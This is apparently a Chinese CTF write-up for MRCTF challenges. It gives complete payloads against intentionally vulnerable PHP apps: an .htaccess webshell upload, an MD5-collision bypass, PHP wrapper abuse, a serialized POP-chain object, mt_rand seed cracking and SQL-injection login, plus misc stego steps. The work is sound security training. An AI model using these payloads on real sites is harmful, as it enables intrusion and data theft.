WEB
PYwebsite
一个购买界面,输入授权码即可查看flag
源代码给了一个md5
以为要爆破。尝试无果后去flag.php看看
XFF本地试试,获得flag
你传你🐎呢
上传题
测试后发现需要上传.htaccess
<FilesMatch "1.aaa"> SetHandler application/x-httpd-php </FilesMatch>
把1.aaa文件解析成php
上传一句话链接根目录即flag
ez_bypass
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 | <?php I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first |
md5绕过
传入id=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 &gg=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
password=1234567e
即可获得flag
套娃
打开后查看源码
1 2 3 4 5 6 7 8 9 | <?php $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "you are going to the next ~"; } |
过滤了_,php有一个黑魔法
传入b_u_p_t,将_替换成等号,%0A绕过正则
进入下一关secrettw.php
源码中发现
控制台跑一下提示了POST一个Merak
之后给了源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | <?php error_reporting(0); include 'takeip.php'; ini_set('open_basedir','.'); include 'flag.php'; if(isset($_POST['Merak'])){ highlight_file(__FILE__); die(); } function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re; } echo 'Local access only!'."<br/>"; $ip = getIp(); if($ip!='127.0.0.1') echo "Sorry,you don't have permission! Your ip is :".$ip; if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){ echo "Your REQUEST is:".change($_GET['file']); echo file_get_contents(change($_GET['file'])); } |
源码中要构造本地IP且要2333=todat is a happy day
并且有一个change函数加密了file
我们写反加密算法算出flag.php(把+变成-即可)
base64加密ZmpdYSZmXGI=
传入变量用php伪协议传入文字
get:secrettw.php?2333=php://input&file=ZmpdYSZmXGI= post:todat is a happy day
获得flag
Ezpop
打开即源码,反序列化题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 | <?php class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $source; public $str; public function __construct($file='index.php'){ $this->source = $file; echo 'Welcome to '.$this->source." "; } public function __toString(){ return $this->str->source; } public function __wakeup(){ if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) { echo "hacker"; $this->source = "index.php"; } } } class Test{ public $p; public function __construct(){ $this->p = array(); } public function __get($key){ $function = $this->p; return $function(); } } |
源码审计
这里需要读flag.php
纵横百度发现类似题,这个应该是改编的
从show类的__wakeup进,
触发本类的tostring,
触发Test类的__get,
触发Modifier类的__invoke
读取flag
给var赋值flag.php
$a=new Show(); $a->source=$a; $b=new Test(); $a->str=$b; $c=new Modifier(); $b->p=$c; $a=serialize($a); echo $a;
得到反序列化的文字:O:4:”Show”:2:{s:6:”source”;r:1;s:3:”str”;O:4:”Test”:1:{s:1:”p”;O:8:”Modifier”:1:{s:6:”*var”;s:8:”flag.php”;}}}
url编码:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D
传入后提示Help Me Find FLAG!,猜测有过滤,尝试伪协议读源码:
php://filter/read=convert.base64-encode/resource=flag.php 赋值给var
url编码:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D
解码base64即可
Ezaudit
源码泄露,下载WWW.ZIP
源码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 | <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Private_key = $_POST['Private_key']; if (($username == '') || ($password == '') ||($Private_key == '')) { // 若为空,视为未填写,提示错误,并3秒后返回登录界面 header('refresh:2; url=login.html'); echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!"; exit; } else if($Private_key != '*************' ) { header('refresh:2; url=login.html'); echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!"; exit; } else{ if($Private_key === '************'){ $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; $link=mysql_connect("localhost","root","root"); mysql_select_db("test",$link); $result = mysql_query($getuser); while($row=mysql_fetch_assoc($result)){ echo "".$row["username"]."".$row["flag"].""; } } } } // genarate public_key function public_key($length = 16) { $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $public_key = ''; for ( $i = 0; $i < $length; $i++ ) $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1); return $public_key; } //genarate private_key function private_key($length = 12) { $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; $private_key = ''; for ( $i = 0; $i < $length; $i++ ) $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1); return $private_key; } $Public_key = private_key(); //$Public_key = KVQP0LdJKRaV3n9D how to get crispr's private_key???K |
看到公私要可能要种子爆破,使用php_mt_seed算出种子1775196155
把公钥和私钥算法放一起,规定种子算出私钥后万能密码登录flag
MISC
pyFlag
打开后是三个图片
010editor打开尾部是压缩包的三个部分,拼合成一个后爆破压缩包
密码1234
之后base85,base16,base32,base16,base64
解密获得flag
千层套路
密码即压缩包名
PYthon脚本见BJDCTF 的TARGZ – Y1ng
解压出来一个QR.TXT 全部为RGB值,之后python RGB转图片出一个二维码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | #-*- coding:utf-8 -*- from PIL import Image import re x = 200 #x坐标 通过对txt里的行数进行整数分解 y = 200 #y坐标 x*y = 行数 im = Image.new("RGB",(x,y))#创建图片 file = open('C:\\Users\\Admin\\Documents\\qr.txt') #打开rbg值文件 #通过一个个rgb点生成图片 for i in range(0,x): for j in range(0,y): line = file.readline()#获取一行 rgb = line.split(",")#分离rgb im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))#rgb转化为像素 im.show() |
扫描即flag
Unravel!!
打开后一个压缩包,一个音频,一个图片
其中音频名提示了看文件末尾
winhex发现一串加密字符:
U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=
图片分离出另一张名为AES的图,里面有文字Tokyo;
尝试aes解码
获得压缩包的密码为:CCGandGulu
解压出Ending.wav
使用工具SilentEye
获得flag